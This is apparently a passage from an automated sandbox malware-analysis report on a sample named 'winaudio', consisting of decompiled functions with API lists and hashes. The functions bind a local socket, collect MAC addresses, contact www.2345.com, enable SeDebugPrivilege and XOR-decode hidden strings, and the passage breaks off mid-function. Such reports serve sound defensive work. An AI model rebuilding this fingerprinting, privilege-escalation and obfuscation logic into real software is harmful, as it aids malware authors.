                        Function 002D1C10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • socket.WS2_32(00000002,00000001,00000000), ref: 002D1C2A
                        • GetLastError.KERNEL32 ref: 002D1C37
                        • inet_addr.WS2_32(127.0.0.1), ref: 002D1C72
                        • htons.WS2_32 ref: 002D1C7C
                        • bind.WS2_32(00000000,?,00000010), ref: 002D1C97
                        • GetLastError.KERNEL32 ref: 002D1CA2
                        • closesocket.WS2_32(00000000), ref: 002D1CA9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorLast$bindclosesockethtonsinet_addrsocket
                        • String ID: 127.0.0.1
                        • API String ID: 4204252758-3619153832
                        • Opcode ID: faa21b7c37ead1928c7dd4f14d3d16ce9bd394b457cc4e5102321758effed4d6
                        • Instruction ID: 00f99625e5fd35b7b43a19b53b669d3ddf6f1e7c96a7bf438bd10d94d1adf7aa
                        • Opcode Fuzzy Hash: faa21b7c37ead1928c7dd4f14d3d16ce9bd394b457cc4e5102321758effed4d6
                        • Instruction Fuzzy Hash: 2421F331A201089BCB01EFB8EC4A7AEB7BCEF45320F400B2BE455D72D1DBB589508B95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DE070 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 181COMMON
                        Download Yara Rule
                        C-Code - Quality: 61%
                        			E002DE070(void* __ebx, char __ecx, signed char __edx, void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v276;
				intOrPtr _v280;
				char _v284;
				char _v300;
				char _v304;
				char _v308;
				void* __esi;
				void* __ebp;
				signed int _t42;
				signed int _t43;
				void* _t55;
				intOrPtr _t59;
				signed char _t76;
				signed char _t77;
				char _t80;
				signed int _t83;
				signed int _t85;
				char _t90;
				intOrPtr* _t100;
				intOrPtr _t101;
				signed int _t103;
				signed char _t106;
				intOrPtr* _t108;
				void* _t110;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t121 = __eflags;
				_t106 = __edx;
				_push(0xffffffff);
				_push(0x39cceb);
				_push( *[fs:0x0]);
				_t42 =  *0x3e1008; // 0x847b54ee
				_t43 = _t42 ^ _t114;
				_v20 = _t43;
				_push(_t110);
				_push(_t43);
				 *[fs:0x0] =  &_v16;
				_t90 = __ecx;
				_v304 = __ecx;
				_push(1);
				_v308 = 0;
				_v280 = 0xf;
				_v284 = 0;
				_v300 = 0;
				E002D0860(__ecx,  &_v300, 0x3dd5c0);
				_v8 = 0;
				_t108 = E002E057E(_t106, _t110, _t121, 0x288);
				E0037E1A0(_t108, _t108, 0, 0x288);
				_t117 = _t115 - 0x124 + 0x10;
				if(_t108 != 0) {
					_v304 = 0x288;
					E0037E1A0(_t108, _t108, 0, 0x288);
					_t112 =  *0x39e030;
					_t118 = _t117 + 0xc;
					_t55 =  *_t112(_t108,  &_v304); // executed
					 *0x3f0830 = 0x7ff7;
					_t123 = _t55 - 0x6f;
					if(_t55 != 0x6f) {
						L4:
						if(_t55 == 0) {
							E0037E1A0(_t108,  &_v276, _t55, 0xff);
							_t118 = _t118 + 0xc;
							_t113 = _t108;
							if(_t108 != 0) {
								_t103 =  *0x3ebbfc; // 0x2
								asm("o16 nop [eax+eax]");
								while(1) {
									_t106 =  *(_t113 + 0x195);
									_t103 =  >  ? 0 : _t103 + 2;
									 *0x3ebbfc = _t103;
									 *0x3f0830 = _t103 & 0x00000019 | 0x000000e0;
									if( *(_t113 + 0x194) != _t106) {
										break;
									}
									_t76 =  *(_t113 + 0x196);
									if(_t106 != _t76) {
										break;
									} else {
										_t106 =  *(_t113 + 0x197);
										if(_t76 != _t106) {
											break;
										} else {
											_t77 =  *(_t113 + 0x198);
											if(_t106 != _t77 || _t77 !=  *(_t113 + 0x199)) {
												break;
											} else {
												_t113 =  *_t113;
												if(_t113 != 0) {
													continue;
												} else {
												}
											}
										}
									}
									goto L15;
								}
								wsprintfA( &_v276, "%02X-%02X-%02X-%02X-%02X-%02X",  *(_t113 + 0x194) & 0x000000ff,  *(_t113 + 0x195) & 0x000000ff,  *(_t113 + 0x196) & 0x000000ff,  *(_t113 + 0x197) & 0x000000ff,  *(_t113 + 0x198) & 0x000000ff,  *(_t113 + 0x199) & 0x000000ff);
								_t118 = _t118 + 0x20;
								 *0x3f098c =  *(_t113 + 0x194);
								 *0x3f0990 =  *(_t113 + 0x198);
							}
							L15:
							if(_v276 != 0) {
								_t100 =  &_v276;
								_t34 = _t100 + 1; // 0x1
								_t106 = _t34;
								do {
									_t59 =  *_t100;
									_t100 = _t100 + 1;
									__eflags = _t59;
								} while (_t59 != 0);
								_t101 = _t100 - _t106;
								__eflags = _t101;
							} else {
								_t101 = 0;
							}
							_push(_t101);
							E002D0860(_t90,  &_v300,  &_v276);
						}
						L002E086C(_t108);
					} else {
						while(1) {
							L002E086C(_t108);
							_t80 = _v304 + 0x20;
							_push(_t80);
							_v304 = _t80;
							_t108 = E002E0A70(_t106, _t112, _t123);
							_t120 = _t118 + 8;
							if(_t108 == 0) {
								goto L22;
							}
							E0037E1A0(_t108, _t108, 0, _v304);
							_t83 =  *0x3ebc2c; // 0x6556
							_t118 = _t120 + 0xc;
							_t85 =  >  ? 0 : _t83 + 2;
							 *0x3ebc2c = _t85;
							 *0x3f0830 = _t85 & 0x00000019 | 0x000000e0;
							_t55 =  *_t112(_t108,  &_v304);
							if(_t55 == 0x6f) {
								continue;
							} else {
								goto L4;
							}
							goto L22;
						}
					}
				}
				L22:
				E002D0540(_t90,  &_v300);
				E002D0420(_t90,  &_v300, _t108);
				 *[fs:0x0] = _v16;
				_pop(_t111);
				return E002E056D(_v20 ^ _t114, _t106, _t111);
			}







































                        0x002de070
                        0x002de070
                        0x002de073
                        0x002de075
                        0x002de080
                        0x002de087
                        0x002de08c
                        0x002de08e
                        0x002de092
                        0x002de094
                        0x002de098
                        0x002de09e
                        0x002de0a0
                        0x002de0a6
                        0x002de0b3
                        0x002de0bd
                        0x002de0c7
                        0x002de0d1
                        0x002de0d8
                        0x002de0e2
                        0x002de0f3
                        0x002de0f8
                        0x002de0fd
                        0x002de102
                        0x002de110
                        0x002de11a
                        0x002de11f
                        0x002de12b
                        0x002de130
                        0x002de132
                        0x002de13c
                        0x002de13f
                        0x002de1ad
                        0x002de1af
                        0x002de1c2
                        0x002de1c7
                        0x002de1ca
                        0x002de1ce
                        0x002de1d4
                        0x002de1da
                        0x002de1e0
                        0x002de1e0
                        0x002de1f1
                        0x002de1f6
                        0x002de204
                        0x002de20f
                        0x00000000
                        0x00000000
                        0x002de211
                        0x002de219
                        0x00000000
                        0x002de21b
                        0x002de21b
                        0x002de223
                        0x00000000
                        0x002de225
                        0x002de225
                        0x002de22d
                        0x00000000
                        0x002de237
                        0x002de237
                        0x002de23b
                        0x00000000
                        0x00000000
                        0x002de23d
                        0x002de23b
                        0x002de22d
                        0x002de223
                        0x00000000
                        0x002de219
                        0x002de27b
                        0x002de287
                        0x002de28a
                        0x002de295
                        0x002de295
                        0x002de29a
                        0x002de2a1
                        0x002de2a7
                        0x002de2ad
                        0x002de2ad
                        0x002de2b0
                        0x002de2b0
                        0x002de2b2
                        0x002de2b3
                        0x002de2b3
                        0x002de2b7
                        0x002de2b7
                        0x002de2a3
                        0x002de2a3
                        0x002de2a3
                        0x002de2b9
                        0x002de2c7
                        0x002de2c7
                        0x002de2cd
                        0x00000000
                        0x002de141
                        0x002de142
                        0x002de14d
                        0x002de150
                        0x002de151
                        0x002de15c
                        0x002de15e
                        0x002de163
                        0x00000000
                        0x00000000
                        0x002de172
                        0x002de177
                        0x002de17c
                        0x002de189
                        0x002de18c
                        0x002de199
                        0x002de1a6
                        0x002de1ab
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002de1ab
                        0x002de141
                        0x002de13f
                        0x002de2d5
                        0x002de2de
                        0x002de2e9
                        0x002de2f3
                        0x002de2fc
                        0x002de30b

                        APIs
                        • new.LIBCMT ref: 002DE0E9
                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 002DE130
                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 002DE1A6
                        • wsprintfA.USER32 ref: 002DE27B
                        Strings
                        • %02X-%02X-%02X-%02X-%02X-%02X, xrefs: 002DE275
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AdaptersInfo$wsprintf
                        • String ID: %02X-%02X-%02X-%02X-%02X-%02X
                        • API String ID: 4136363027-960560484
                        • Opcode ID: 3b1da9714a8cc47c32b00fb5f3117ca850050e5e3893d9ac3db2575bf15575af
                        • Instruction ID: 93b31006efe0ca7ae61b10dea26b44e6ff18edce9da270a06338d36532de3014
                        • Opcode Fuzzy Hash: 3b1da9714a8cc47c32b00fb5f3117ca850050e5e3893d9ac3db2575bf15575af
                        • Instruction Fuzzy Hash: 6F6133719102444AEB22EF74DC92BFABBFCAB09300F4404AAE59DDB381DB745D958F90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DD870 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200COMMON
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E002DD870(void* __ebx, char** __ecx, char** __edi, intOrPtr _a4, char* _a12) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				void* _v48;
				intOrPtr _v52;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char* _v84;
				intOrPtr _v88;
				char** _v92;
				void* __esi;
				void* __ebp;
				signed int _t47;
				signed int _t48;
				intOrPtr _t50;
				intOrPtr _t51;
				char* _t52;
				intOrPtr _t53;
				signed int _t54;
				signed int _t64;
				signed int _t66;
				char* _t69;
				char** _t74;
				void* _t75;
				void* _t81;
				signed int _t83;
				void* _t84;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				char** _t99;
				signed int _t100;
				char** _t102;
				char* _t104;
				signed int _t105;
				intOrPtr* _t113;
				signed int _t120;
				signed int _t122;
				intOrPtr _t136;
				void* _t137;
				signed int _t139;
				void* _t140;
				void* _t141;

				_t133 = __edi;
				_push(0xffffffff);
				_push(0x39cc40);
				_push( *[fs:0x0]);
				_t141 = _t140 - 0x50;
				_t47 =  *0x3e1008; // 0x847b54ee
				_t48 = _t47 ^ _t139;
				_v20 = _t48;
				_push(__ebx);
				_push(__edi);
				_push(_t48);
				 *[fs:0x0] =  &_v16;
				_t99 = __ecx;
				_v92 = __ecx;
				_t148 = "www.2345.com";
				_t50 =  *0x3f0988; // 0x68f
				_t136 = _a4;
				_v76 = _t50;
				_t51 =  *0x3f0984; // 0x11a3f08
				_v80 = _t51;
				_t52 =  *0x3f0980; // 0x4a0
				_v84 = _t52;
				_t53 =  *0x3f0870; // 0x1198cd0
				_v72 = _t136;
				_v88 = _t53;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if("www.2345.com" != 0) {
					_t104 = "www.2345.com";
					_t132 =  &(_t104[1]);
					do {
						_t54 =  *_t104;
						_t104 =  &(_t104[1]);
						__eflags = _t54;
					} while (_t54 != 0);
					_t105 = _t104 - _t132;
					__eflags = _t105;
				} else {
					_t105 = 0;
				}
				_push(_t105);
				E002D0860(_t99,  &_v44, "www.2345.com");
				_v8 = 0;
				E003540B0(_t99,  &_v44, _t133);
				E00354280();
				E002E22F0(_t132, _t133, _t136, _t148);
				E002E22C0();
				if(_t136 == 0) {
					L20:
					_t100 = 0;
					__eflags = 0;
				} else {
					 *0x3f0830 = 0x7ff7;
					if(E002D1BD0() == 0) {
						goto L20;
					} else {
						_t64 =  *0x3ebbf0; // 0x8
						_t66 =  >  ? 0 : _t64 + 2;
						_t113 = _t141 - 0x18;
						 *0x3ebbf0 = _t66;
						 *0x3f0830 = _t66 & 0x00000019 | 0x000000e0;
						 *((intOrPtr*)(_t113 + 0x14)) = 0xf;
						 *((intOrPtr*)(_t113 + 0x10)) = 0;
						_t152 =  *((intOrPtr*)(_t113 + 0x14)) - 0x10;
						if( *((intOrPtr*)(_t113 + 0x14)) < 0x10) {
							_t69 = _t113;
						} else {
							_t69 =  *_t113;
						}
						_push(0xffffffff);
						 *_t69 = 0;
						_push(0);
						E002D0960(_t99, _t113,  &_v44);
						E002D1DF0(_t99,  &_v68, _t133, _t152); // executed
						_v8 = 1;
						if(_v52 < 1) {
							L19:
							_t100 = 0;
							E002D0420(0,  &_v68, _t133);
						} else {
							_t132 = 0x1bb;
							_t117 =  >=  ? _v68 :  &_v68;
							_t74 = E002D1D10(_t99,  >=  ? _v68 :  &_v68, 0x1bb, _t133); // executed
							_t133 = _t74;
							if(_t74 < 1) {
								goto L19;
							} else {
								_t119 =  >=  ? _v44 :  &_v44;
								_t75 = E002D11B0(_t99,  >=  ? _v44 :  &_v44, 0x1bb, _v24 - 0x10);
								_t138 = _t75;
								if(_t75 == 0) {
									 *0x3f0830 = 0x7ff7;
									goto L19;
								} else {
									_t120 =  *0x3ebbe4; // 0x8
									_t122 =  >  ? 0 : _t120 + 2;
									 *0x3ebbe4 = _t122;
									 *0x3f0830 = _t122 & 0x00000019 | 0x000000e0;
									E003523F0(_t99, 0x1bb, _t133, _t120 + 2 - 0x1490, _t138, _t133);
									if(E003516A0(_t138) != 1) {
										L17:
										E002D16F0(_t138, _t132);
										_t100 = 0;
										E002D0420(0,  &_v68, _t133);
									} else {
										_t30 = _t99 + 0x4c; // 0x4c
										_t133 = _t30;
										_t102 = _t99 + 0x48;
										_t81 = E00351D20(_t138);
										_t132 = _v84;
										if(E002D1820(_v88, _v84, _v80, _v76, _t81, _t102, _t133, _v72) == 0) {
											_t83 =  *0x3ebbe8; // 0x6556
											_t84 = _t83 + 2;
											__eflags = _t84 - 0x1490;
											_t85 =  >  ? 0 : _t84;
											 *0x3ebbe8 = _t85;
											_t87 = _t85 & 0x00000019 | 0x000000e0;
											__eflags = _t87;
											 *0x3f0830 = _t87;
											goto L17;
										} else {
											_t88 =  *0x3ebbec; // 0x8
											_t132 =  *_t133;
											_t133 = _v92;
											_t90 =  >  ? 0 : _t88 + 2;
											 *0x3ebbec = _t90;
											_t133[0x10] =  *_t102;
											 *0x3f0830 = _t90 & 0x00000019 | 0x000000e0;
											_t133[0xf] = _a12;
											_t133[0x11] = _t132;
											E002D16F0(_t138, _t132);
											 *0x3f0830 = 0x7ff7; // executed
											SetUnhandledExceptionFilter(0x2dd830); // executed
											E002DD700(); // executed
											_t100 = 1;
											E002D0420(1,  &_v68, _t133, "..\n");
										}
									}
								}
							}
						}
					}
				}
				E002D0420(_t100,  &_v44, _t133);
				 *[fs:0x0] = _v16;
				_pop(_t137);
				return E002E056D(_v20 ^ _t139, _t132, _t137);
			}




















































                        0x002dd870
                        0x002dd873
                        0x002dd875
                        0x002dd880
                        0x002dd881
                        0x002dd884
                        0x002dd889
                        0x002dd88b
                        0x002dd88e
                        0x002dd890
                        0x002dd891
                        0x002dd895
                        0x002dd89b
                        0x002dd89d
                        0x002dd8a0
                        0x002dd8a7
                        0x002dd8ac
                        0x002dd8af
                        0x002dd8b2
                        0x002dd8b7
                        0x002dd8ba
                        0x002dd8bf
                        0x002dd8c2
                        0x002dd8c7
                        0x002dd8ca
                        0x002dd8cd
                        0x002dd8d4
                        0x002dd8db
                        0x002dd8df
                        0x002dd8e5
                        0x002dd8ea
                        0x002dd8f0
                        0x002dd8f0
                        0x002dd8f2
                        0x002dd8f3
                        0x002dd8f3
                        0x002dd8f7
                        0x002dd8f7
                        0x002dd8e1
                        0x002dd8e1
                        0x002dd8e1
                        0x002dd8f9
                        0x002dd902
                        0x002dd907
                        0x002dd90e
                        0x002dd913
                        0x002dd918
                        0x002dd91d
                        0x002dd924
                        0x002ddb0d
                        0x002ddb0d
                        0x002ddb0d
                        0x002dd92a
                        0x002dd92a
                        0x002dd93b
                        0x00000000
                        0x002dd941
                        0x002dd941
                        0x002dd950
                        0x002dd956
                        0x002dd958
                        0x002dd965
                        0x002dd96a
                        0x002dd971
                        0x002dd978
                        0x002dd97c
                        0x002dd982
                        0x002dd97e
                        0x002dd97e
                        0x002dd97e
                        0x002dd984
                        0x002dd986
                        0x002dd98c
                        0x002dd98f
                        0x002dd997
                        0x002dd99f
                        0x002dd9a7
                        0x002ddb01
                        0x002ddb04
                        0x002ddb06
                        0x002dd9ad
                        0x002dd9b4
                        0x002dd9b9
                        0x002dd9bd
                        0x002dd9c2
                        0x002dd9c7
                        0x00000000
                        0x002dd9cd
                        0x002dd9d4
                        0x002dd9d8
                        0x002dd9dd
                        0x002dd9e1
                        0x002ddaf7
                        0x00000000
                        0x002dd9e7
                        0x002dd9e7
                        0x002dd9f9
                        0x002dd9fc
                        0x002dda0c
                        0x002dda12
                        0x002dda23
                        0x002ddae4
                        0x002ddae6
                        0x002ddaee
                        0x002ddaf0
                        0x002dda29
                        0x002dda2c
                        0x002dda2c
                        0x002dda2f
                        0x002dda35
                        0x002dda3a
                        0x002dda56
                        0x002ddac2
                        0x002ddac7
                        0x002ddaca
                        0x002ddacf
                        0x002ddad2
                        0x002ddada
                        0x002ddada
                        0x002ddadf
                        0x00000000
                        0x002dda58
                        0x002dda58
                        0x002dda5d
                        0x002dda62
                        0x002dda6a
                        0x002dda6f
                        0x002dda7c
                        0x002dda7f
                        0x002dda89
                        0x002dda8c
                        0x002dda8f
                        0x002dda99
                        0x002ddaa3
                        0x002ddaae
                        0x002ddab9
                        0x002ddabb
                        0x002ddabb
                        0x002dda56
                        0x002dda23
                        0x002dd9e1
                        0x002dd9c7
                        0x002dd9a7
                        0x002dd93b
                        0x002ddb12
                        0x002ddb1c
                        0x002ddb25
                        0x002ddb34

                        APIs
                          • Part of subcall function 002D16F0: closesocket.WS2_32(00000000), ref: 002D1751
                        • SetUnhandledExceptionFilter.KERNEL32(002DD830), ref: 002DDAA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandledclosesocket
                        • String ID: ..$www.2345.com
                        • API String ID: 477583870-3044977968
                        • Opcode ID: cfb1f732ab112beaa9b0b4cca23fb7aa89e02e16c606da71c1a2f542dfded37d
                        • Instruction ID: d6ca10ec7b3a16cfbfbdc8dbabe2200035c23d7e8e530781a2c92e0e62159e4c
                        • Opcode Fuzzy Hash: cfb1f732ab112beaa9b0b4cca23fb7aa89e02e16c606da71c1a2f542dfded37d
                        • Instruction Fuzzy Hash: 5F71E570A20145CFDB19EFA8DC917AEBBB8FB09308F54012AE4059B392D7759C55CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D7140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                        Download Yara Rule
                        C-Code - Quality: 62%
                        			E002D7140(void* __ecx, void* __edi) {
				signed int _v8;
				long _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				signed int _t10;
				int _t15;
				signed int _t18;
				signed int _t20;
				void* _t31;
				void* _t33;
				void* _t38;
				void* _t39;
				signed int _t40;

				_t42 = (_t40 & 0xfffffff8) - 0x18;
				_t10 =  *0x3e1008; // 0x847b54ee
				_v8 = _t10 ^ (_t40 & 0xfffffff8) - 0x00000018;
				_t33 = __ecx;
				_v24.PrivilegeCount = 0;
				asm("xorps xmm0, xmm0");
				_v12 = 0;
				asm("movq [esp+0x10], xmm0");
				if(__ecx == 0) {
					_pop(_t38);
					return E002E056D(_v8 ^ _t42, _t31, _t38);
				} else {
					_t15 = LookupPrivilegeValueA(0, "SeDebugPrivilege",  &(_v24.Privileges)); // executed
					if(_t15 != 0) {
						_t18 =  *0x3ebb64; // 0x0
						_v24.PrivilegeCount = 1;
						_v12 = 2;
						_t20 =  >  ? 0 : _t18 + 2;
						 *0x3ebb64 = _t20;
						 *0x3f0830 = _t20 & 0x00000019 | 0x000000e0;
						AdjustTokenPrivileges(_t33, 0,  &_v24, 0x10, 0, 0); // executed
					}
					_pop(_t39);
					return E002E056D(_v8 ^ _t42, _t31, _t39);
				}
			}
















                        0x002d7146
                        0x002d7149
                        0x002d7150
                        0x002d7156
                        0x002d7158
                        0x002d7160
                        0x002d7163
                        0x002d716d
                        0x002d7175
                        0x002d71ed
                        0x002d71f8
                        0x002d7177
                        0x002d7182
                        0x002d718a
                        0x002d718c
                        0x002d7196
                        0x002d71a3
                        0x002d71ac
                        0x002d71af
                        0x002d71bf
                        0x002d71cb
                        0x002d71d1
                        0x002d71d6
                        0x002d71e5
                        0x002d71e5

                        APIs
                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 002D7182
                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000002,00000010,00000000,00000000), ref: 002D71CB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                        • String ID: SeDebugPrivilege
                        • API String ID: 3615134276-2896544425
                        • Opcode ID: b8cb4075f8849e3d1dd63614f5e7a9f840b3079756dc32986899eeaac7cae488
                        • Instruction ID: f692f505fbba635cf77d000166bdca56a365363766dbef8edac620abf179930e
                        • Opcode Fuzzy Hash: b8cb4075f8849e3d1dd63614f5e7a9f840b3079756dc32986899eeaac7cae488
                        • Instruction Fuzzy Hash: C611BF716283055BD311DF29EC46B6BB7E8EB88710F404A2EF498C7291EBB4D8448BD2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D7760 Relevance: 3.4, APIs: 2, Instructions: 365sleepCOMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 62%
                        			E002D7760(void* __ebx, intOrPtr __ecx, intOrPtr __edi) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v25;
				short _v27;
				char _v31;
				char _v56;
				char _v57;
				short _v59;
				char _v63;
				char _v88;
				intOrPtr _v92;
				char _v96;
				signed char _v112;
				intOrPtr _v116;
				char _v120;
				signed char _v136;
				signed int _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v184;
				void* __esi;
				void* __ebp;
				signed int _t105;
				signed int _t106;
				signed int _t118;
				void* _t119;
				signed int _t120;
				intOrPtr _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				signed int _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed char _t141;
				signed int _t142;
				signed char* _t145;
				intOrPtr _t146;
				signed char _t150;
				signed char* _t152;
				signed int _t159;
				signed int _t163;
				signed char* _t166;
				intOrPtr _t167;
				signed int _t169;
				signed int _t170;
				signed char _t172;
				signed char _t175;
				signed char* _t177;
				signed int _t184;
				signed int _t190;
				intOrPtr _t194;
				signed int _t200;
				intOrPtr* _t201;
				signed int _t202;
				signed char* _t203;
				signed char _t204;
				void* _t205;
				signed int _t209;
				intOrPtr* _t211;
				signed int _t212;
				signed char* _t213;
				void* _t214;
				signed char _t215;
				void* _t216;
				signed int _t220;
				signed int _t222;
				unsigned int _t227;
				void* _t229;
				void* _t230;
				void* _t233;
				void* _t234;
				intOrPtr _t238;
				void* _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				intOrPtr _t246;
				void* _t258;

				_t237 = __edi;
				_t187 = __ebx;
				_push(0xffffffff);
				_push(0x39c863);
				_push( *[fs:0x0]);
				_t246 = _t245 - 0xa8;
				_t105 =  *0x3e1008; // 0x847b54ee
				_t106 = _t105 ^ _t244;
				_v24 = _t106;
				_push(__ebx);
				_push(_t240);
				_push(__edi);
				_push(_t106);
				 *[fs:0x0] =  &_v16;
				_v20 = _t246;
				_v144 = __ecx;
				_v8 = 0;
				_t222 =  *0x3f09c8; // 0x3b699d8
				if((0x2aaaaaab * (_t222 -  *0x3f09c4) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t222 -  *0x3f09c4) >> 0x20 >> 2) < 1) {
					_t169 = 0;
					L2:
					_v140 = _t169;
					if(_t169 < 0x1a) {
						_t214 = 0;
						_v56 = 0;
						_t170 = _t169 << 5;
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x33], xmm0");
						_v31 = 0;
						asm("movq [ebp-0x23], xmm0");
						_v27 = 0;
						_t14 = _t170 + "CORZFEXO"; // 0x3dd108
						_t234 = _t14;
						_v25 = 0;
						do {
							_t172 =  *(_t234 + _t214) ^ 0x0000002a;
							 *(_t244 + _t214 - 0x34) = _t172;
							if(_t172 != 0x2a || _t214 == 0) {
								goto L8;
							} else {
								if(_t214 >= 0x20) {
									L11:
									E002E0994();
									L12:
									_t211 =  &_v56;
									_t233 = _t211 + 1;
									do {
										_t163 =  *_t211;
										_t211 = _t211 + 1;
										__eflags = _t163;
									} while (_t163 != 0);
									_t212 = _t211 - _t233;
									__eflags = _t212;
								} else {
									 *(_t244 + _t214 - 0x34) = 0;
									goto L8;
								}
							}
							L15:
							_push(_t212);
							_t213 =  &_v112;
							E002D0860(_t187, _t213,  &_v56);
							_v8 = 1;
							_t166 =  &_v112;
							_t243 =  *0x3f09c8; // 0x3b699d8
							if(_t166 >= _t243) {
								L21:
								__eflags = _t243 -  *0x3f09cc; // 0x3b69a08
								if(__eflags == 0) {
									_push(_t213);
									E002D7CF0(_t187, 0x3f09c4);
									_t243 =  *0x3f09c8; // 0x3b699d8
								}
								__eflags = _t243;
								if(__eflags != 0) {
									_t177 =  &_v112;
									goto L25;
								}
							} else {
								_t237 =  *0x3f09c4; // 0x3b69768
								if(_t237 > _t166) {
									goto L21;
								} else {
									_t220 = _t166 - _t237;
									_t184 = (0x2aaaaaab * _t220 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t220 >> 0x20 >> 2);
									_v148 = _t184;
									_t258 = _t243 -  *0x3f09cc; // 0x3b69a08
									if(_t258 == 0) {
										_push(_t220);
										E002D7CF0(_t187, 0x3f09c4);
										_t243 =  *0x3f09c8; // 0x3b699d8
										_t237 =  *0x3f09c4; // 0x3b69768
										_t184 = _v148;
									}
									_t177 = _t237 + (_t184 + _t184 * 2) * 8;
									if(_t243 != 0) {
										L25:
										E002D0540(_t243, _t177);
										_t243 =  *0x3f09c8; // 0x3b699d8
									}
								}
							}
							_t240 = _t243 + 0x18;
